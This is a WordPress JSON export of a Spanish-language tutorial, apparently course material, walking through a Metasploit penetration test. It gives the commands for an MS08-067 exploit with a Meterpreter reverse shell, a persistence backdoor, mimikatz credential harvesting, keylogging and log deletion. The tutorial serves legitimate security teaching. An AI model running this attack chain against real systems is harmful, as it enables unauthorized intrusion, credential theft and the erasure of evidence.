{"id":1282,"date":"2024-12-11T01:16:24","date_gmt":"2024-12-11T01:16:24","guid":{"rendered":"https:\/\/dsantana.uas.edu.mx\/?p=1282"},"modified":"2025-01-16T17:02:08","modified_gmt":"2025-01-16T17:02:08","slug":"manual-completo-pruebas-de-penetracion-explotando-una-vulnerabilidad-con-metasploit-framework","status":"publish","type":"post","link":"https:\/\/dsantana.uas.edu.mx\/index.php\/2024\/12\/11\/manual-completo-pruebas-de-penetracion-explotando-una-vulnerabilidad-con-metasploit-framework\/","title":{"rendered":"Manual Completo: Pruebas de Penetraci\u00f3n &#8211; Explotando una Vulnerabilidad con Metasploit Framework"},"content":{"rendered":"\n<p>Este manual ofrece una gu\u00eda paso a paso para llevar a cabo una prueba de penetraci\u00f3n explotando una vulnerabilidad usando Metasploit Framework. El objetivo es ilustrar el proceso desde el escaneo inicial hasta la explotaci\u00f3n y post-explotaci\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 1: Preparaci\u00f3n del Entorno<\/strong><\/h2>\n\n\n\n<p>Antes de comenzar, aseg\u00farate de tener un entorno controlado y autorizado para realizar pruebas de penetraci\u00f3n.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.1 Requisitos Previos<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Un sistema operativo Debian 12 o similar con Metasploit Framework instalado.<\/li>\n\n\n\n<li>Acceso a la red objetivo.<\/li>\n\n\n\n<li>Permiso expl\u00edcito para realizar pruebas.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>1.2 Verificaci\u00f3n de la Instalaci\u00f3n de Metasploit<\/strong><\/h3>\n\n\n\n<p>Ejecuta el siguiente comando para iniciar Metasploit Framework: msfconsole<\/p>\n\n\n\n<p>Confirma que la base de datos est\u00e1 conectada: db_status<\/p>\n\n\n\n<p>Deber\u00edas ver un mensaje indicando \u00abConnected to msf_database\u00bb.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 2: Reconocimiento y Escaneo<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>2.1 Escaneo con Nmap<\/strong><\/h3>\n\n\n\n<p>Usa Nmap para identificar hosts activos y servicios abiertos: nmap -sS -sV 192.168.1.0\/24<\/p>\n\n\n\n<p>Esto listar\u00e1 los puertos abiertos y las versiones de servicios, cruciales para identificar vulnerabilidades.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>2.2 Importaci\u00f3n de Resultados a Metasploit<\/strong><\/h3>\n\n\n\n<p>Importa los resultados del escaneo a Metasploit: db_import \/ruta\/a\/resultado_nmap.xml<\/p>\n\n\n\n<p>Visualiza los hosts importados: hosts<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 3: Selecci\u00f3n de la Vulnerabilidad<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3.1 Identificaci\u00f3n de Vulnerabilidades<\/strong><\/h3>\n\n\n\n<p>Supongamos que el escaneo identifica un servicio SMB en un sistema Windows XP (puerto 445). Busca un exploit relacionado: search smb<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>3.2 Elecci\u00f3n del Exploit<\/strong><\/h3>\n\n\n\n<p>Selecciona el m\u00f3dulo de exploit apropiado, por ejemplo: use exploit\/windows\/smb\/ms08_067_netapi<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 4: Configuraci\u00f3n del Exploit<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>4.1 Configuraci\u00f3n de Opciones<\/strong><\/h3>\n\n\n\n<p>Revisa las opciones disponibles: show options<\/p>\n\n\n\n<p>Configura las opciones necesarias:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set RHOSTS 192.168.1.100\nset PAYLOAD windows\/meterpreter\/reverse_tcp\nset LHOST 192.168.1.10\nset LPORT 4444<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>4.2 Comprobaci\u00f3n de Vulnerabilidad<\/strong><\/h3>\n\n\n\n<p>Verifica si el objetivo es vulnerable: check<\/p>\n\n\n\n<p>Un resultado positivo indica que el sistema puede ser explotado.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 5: Ejecuci\u00f3n del Exploit<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>5.1 Lanzamiento del Exploit<\/strong><\/h3>\n\n\n\n<p>Ejecuta el exploit: run<\/p>\n\n\n\n<p>Si es exitoso, deber\u00edas obtener una sesi\u00f3n de Meterpreter.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>5.2 Comandos B\u00e1sicos en Meterpreter<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Ver informaci\u00f3n del sistema: <code>sysinfo<\/code><\/li>\n\n\n\n<li>Listar archivos en el directorio actual: <code>ls<\/code><\/li>\n\n\n\n<li>Descargar un archivo: download archivo.txt \/ruta\/local<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>4. Obtener una shell del sistema:\n```bash\nshell<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 6: Post-Explotaci\u00f3n<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>6.1 Persistencia<\/strong><\/h3>\n\n\n\n<p>Configura un mecanismo de persistencia para mantener el acceso: run persistence -U -i 10 -p 4444 -r 192.168.1.10<\/p>\n\n\n\n<p>Esto crea un backdoor que se ejecuta cada vez que el sistema arranca.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>6.2 Recolecci\u00f3n de Informaci\u00f3n<\/strong><\/h3>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Obtener credenciales: <code>run post\/windows\/gather\/credentials\/mimikatz<\/code><\/li>\n\n\n\n<li>Capturar el registro de teclas: <code>keyscan_start keyscan_dump<\/code><\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 7: Limpieza del Sistema<\/strong><\/h2>\n\n\n\n<p>Es fundamental eliminar cualquier rastro de la prueba:<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Sal de Meterpreter:<code> exit<\/code><\/li>\n\n\n\n<li>Reinicia el sistema objetivo para eliminar la persistencia.<\/li>\n\n\n\n<li>Borra los logs generados durante la prueba.<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Secci\u00f3n 8: Informe Final<\/strong><\/h2>\n\n\n\n<p>Documenta los hallazgos en un informe profesional:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Descripci\u00f3n del sistema objetivo.<\/li>\n\n\n\n<li>Detalles de las vulnerabilidades explotadas.<\/li>\n\n\n\n<li>Impacto potencial.<\/li>\n\n\n\n<li>Recomendaciones para mitigar los riesgos.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Conclusi\u00f3n<\/strong><\/h2>\n\n\n\n<p>Este manual proporciona una gu\u00eda completa para realizar pruebas de penetraci\u00f3n utilizando Metasploit Framework. Siempre recuerda realizar estas actividades de manera \u00e9tica y con autorizaci\u00f3n. Las habilidades adquiridas deben usarse para fortalecer la seguridad, no para comprometerla.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Este manual ofrece una gu\u00eda paso a paso para llevar a cabo una prueba de penetraci\u00f3n explotando una vulnerabilidad usando Metasploit Framework. El objetivo es ilustrar el proceso desde el escaneo inicial hasta la explotaci\u00f3n y post-explotaci\u00f3n. Secci\u00f3n 1: Preparaci\u00f3n del Entorno Antes de comenzar, aseg\u00farate de tener un entorno controlado y autorizado para realizar pruebas de penetraci\u00f3n. 1.1 Requisitos Previos 1.2 Verificaci\u00f3n de la Instalaci\u00f3n de Metasploit Ejecuta el siguiente comando para iniciar Metasploit Framework: msfconsole Confirma que la base de datos est\u00e1 conectada: db_status Deber\u00edas ver un mensaje indicando \u00abConnected to msf_database\u00bb. Secci\u00f3n 2: Reconocimiento y Escaneo 2.1 Escaneo con Nmap Usa Nmap para identificar hosts activos y servicios abiertos: nmap -sS -sV 192.168.1.0\/24 Esto listar\u00e1 los puertos abiertos y las versiones de servicios, cruciales para identificar vulnerabilidades. 2.2 Importaci\u00f3n de Resultados a Metasploit Importa los resultados del escaneo a Metasploit: db_import \/ruta\/a\/resultado_nmap.xml Visualiza los hosts importados: hosts Secci\u00f3n 3: Selecci\u00f3n de la Vulnerabilidad 3.1 Identificaci\u00f3n de Vulnerabilidades Supongamos que el escaneo identifica un servicio SMB en un sistema Windows XP (puerto 445). Busca un exploit relacionado: search smb 3.2 Elecci\u00f3n del Exploit Selecciona el m\u00f3dulo de exploit apropiado, por ejemplo: use exploit\/windows\/smb\/ms08_067_netapi Secci\u00f3n 4: Configuraci\u00f3n del Exploit 4.1 Configuraci\u00f3n de Opciones Revisa las opciones disponibles: show options Configura las opciones necesarias: 4.2 Comprobaci\u00f3n de Vulnerabilidad Verifica si el objetivo es vulnerable: check Un resultado positivo indica que el sistema puede ser explotado. Secci\u00f3n 5: Ejecuci\u00f3n del Exploit 5.1 Lanzamiento del Exploit Ejecuta el exploit: run Si es exitoso, deber\u00edas obtener una sesi\u00f3n de Meterpreter. 5.2 Comandos B\u00e1sicos en Meterpreter Secci\u00f3n 6: Post-Explotaci\u00f3n 6.1 Persistencia Configura un mecanismo de persistencia para mantener el acceso: run persistence -U -i 10 -p 4444 -r 192.168.1.10 Esto crea un backdoor que se ejecuta cada vez que el sistema arranca. 6.2 Recolecci\u00f3n de Informaci\u00f3n Secci\u00f3n 7: Limpieza del Sistema Es fundamental eliminar cualquier rastro de la prueba: Secci\u00f3n 8: Informe Final Documenta los hallazgos en un informe profesional: Conclusi\u00f3n Este manual proporciona una gu\u00eda completa para realizar pruebas de penetraci\u00f3n utilizando Metasploit Framework. Siempre recuerda realizar estas actividades de manera \u00e9tica y con autorizaci\u00f3n. Las habilidades adquiridas deben usarse para fortalecer la seguridad, no para comprometerla.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,87,1,6,88],"tags":[],"class_list":["post-1282","post","type-post","status-publish","format-standard","hentry","category-docencia","category-seguridad-talleres","category-sin-categoria","category-talleres","category-test-de-penetracion"],"_links":{"self":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts\/1282","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/comments?post=1282"}],"version-history":[{"count":1,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts\/1282\/revisions"}],"predecessor-version":[{"id":1283,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/posts\/1282\/revisions\/1283"}],"wp:attachment":[{"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/media?parent=1282"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/categories?post=1282"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dsantana.uas.edu.mx\/index.php\/wp-json\/wp\/v2\/tags?post=1282"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}